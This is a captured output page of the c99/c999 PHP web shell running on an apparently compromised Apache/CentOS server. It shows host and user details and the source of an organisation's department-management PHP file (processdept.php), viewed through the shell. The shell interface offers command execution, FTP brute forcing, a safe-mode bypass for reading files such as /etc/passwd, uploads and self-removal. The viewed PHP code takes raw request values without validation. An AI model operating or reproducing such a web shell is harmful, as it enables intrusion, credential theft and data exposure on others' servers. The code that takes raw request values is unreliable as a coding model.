!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mistk/eperson/admin/   drwxr-xr-x
Free 50.95 GB of 127.8 GB (39.86%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     processdept.php (4.03 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
include_once("../../class/clsConnection.php");
include_once(
"../../class/clsDB.php");
include_once 
"../global.php";
include_once 
"../class/clsDepartment.php";
include_once 
"../link/function.php";
include_once 
"../class/clsPerson.php";
include_once 
"../class/clsdeptref.php";

$oC = new clsConnection($GLOBALS['DBHOST'], $GLOBALS['DBNAME_EPERSON'], $GLOBALS['DBUSER_EPERSON'], $GLOBALS['DBPASS_EPERSON']);

$obj = new Department($oC);
$obj1 = new Department($oC);
$oDp= new Department($oC);
$oDp2= new Department($oC);
$oPS = new Person($oC);
$oDr= new deptref($oC);
if(
$method=="add"){
            
$obj->AddNew();
            
$obj->deptId=$obj->GetNextCode();
            
$obj->deptName=$deptName;
            
$obj->depttypeId=$depttypeId;
            
$obj->deptParentId=$deptParentId;
            
$obj->deptLevel=$deptLevel;
            
$obj->deptstartyear=$startyear;
            
$obj->deptendyear=$endyear;
            
$obj->deptgroup=$deptgroup;
            
$obj->Save();
}else if(
$method=="edit"){
            
$obj->SearchByKey($deptId);
            
$obj->GetRecord();
            
$obj->Edit();
            
$obj->deptId=$deptId;
            
$obj->deptName=$deptName;
            
$obj->depttypeId=$depttypeId;
            
$obj->deptParentId=$obj->deptParentId;
            
$obj->deptLevel=$obj->deptLevel;
            
$obj->deptstartyear=$obj->deptstartyear;
            
$obj->deptendyear=$obj->deptendyear;
            
$obj->deptgroup=$obj->deptgroup;
            
$obj->Save();
}else if(
$method=="confirmdeptdate"){
            
$oDp->RSMainDepartmentdeptDate0();
            while(
$oDp->GetRecord()){
                
$oDp->Edit();
                
$oDp->deptId=$oDp->deptId;
                
$oDp->deptName=$oDp->deptName;
                
$oDp->deptDesc=$oDp->deptDesc;
                
$oDp->deptCode=$oDp->deptCode;
                
$oDp->deptParent=$oDp->deptParent;
                
$oDp->deptYear=$oDp->deptYear;
                
$oDp->deptDate=splitDateForm($DocDate,"/");
                
$oDp->deptRef=$oDp->deptRef;
                
$oDp->pbriId=$oDp->pbriId;
                
$oDp->depttypeId=$oDp->depttypeId;
                
$oDp->deptParentId=$oDp->deptParentId;
                
$oDp->deptLevel=$oDp->deptLevel;
                
$oDp->deptgroup=$oDp->deptgroup;
                
$oDp->Save();
            }
            
            
//---update person move dept 
            
$oPS->RSPersonf1(); 
             while(
$oPS->GetRecord()){
                                
$oPS->Edit();
                                
$oPS->personId=$oPS->personId;
                                
//echo "personId=".$oPS->personId."<br>";
                                
$oDr->searchBydeptRefId($oPS->deptId);
                                if(
$oDr->GetRecord()==1){
                                    
$oPS->deptId=$oDr->deptId;
                                    
//echo "deptIdnew=".$oPS->deptId."<br>";
                                
}else{
                                    
$oPS->deptId=$oPS->deptId;
                                    
//echo "deptIdold=".$oPS->deptId."<br>";
                                
}
                                
$oPS->workGpId=$oPS->workGpId;
                                
$oPS->prefixId=$oPS->prefixId;
                                
$oPS->fName=$oPS->fName;
                                
$oPS->lName=$oPS->lName;
                                
$oPS->fStatus=$oPS->fStatus;
                                
$oPS->adminId=$oPS->adminId;
                                
$oPS->fRetire=$oPS->fRetire;
                                
$oPS->hireId=$oPS->hireId;
                                
//echo "เจอ=update=".$oPS->fName."".$oPS->lName."fstatus=".$oPS->fStatus."<br>";
                                
$oPS->Save();
                                
//echo "-----------------<br>";
             
}
        echo 
"<meta http-equiv='refresh' content='0; URL=showdept.php'>";
}else if(
$method=="delete"){

    
$obj->SearchByKey($deptId);
    
$obj->GetRecord();
    
$obj->Delete();
    
    
DelDeptParent($deptId);
    echo 
"<meta http-equiv='refresh' content='0; URL=deptstructure.php'>";
}else if(
$method=="deleteyear"){
    
$obj->RSyear($startyear,$endyear);
    while(
$obj->GetRecord()){
            
$obj1->SearchByKey($obj->deptId);
            
$obj1->GetRecord();
            
$obj1->Delete();
    }
}else if(
$method=="deletedept"){
    
$obj->searchdeptDate($deptDate);
    while(
$obj->GetRecord()){
        
$obj->Delete();
        
$oDr->deleteDept($obj->deptId);
    }
    echo 
"<meta http-equiv='refresh' content='0; URL=showdept.php'>";
}
function 
DelDeptParent($p){
include_once(
"../../class/clsConnection.php");
include_once(
"../../class/clsDB.php");
include_once 
"../global.php";
include_once 
"../class/clsDepartment.php";
include_once 
"../class/clsdeptref.php";

$oC = new clsConnection($GLOBALS['DBHOST'], $GLOBALS['DBNAME_EPERSON'], $GLOBALS['DBUSER_EPERSON'], $GLOBALS['DBPASS_EPERSON']);
$obj1 = new Department($oC);
$oDr= new deptref($oC);

        
$obj1->RSdepthavedeptParentId($p);
        while(
$obj1->GetRecord()){
            if(
$obj1->deptId!=""){
                
$p=$obj1->deptId;
                
$obj1->Delete();
                
DelDeptParent($p);
            }
        }
        
$oDr->deleteDept($p);
}
$oC->Disconnect();
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0114 ]--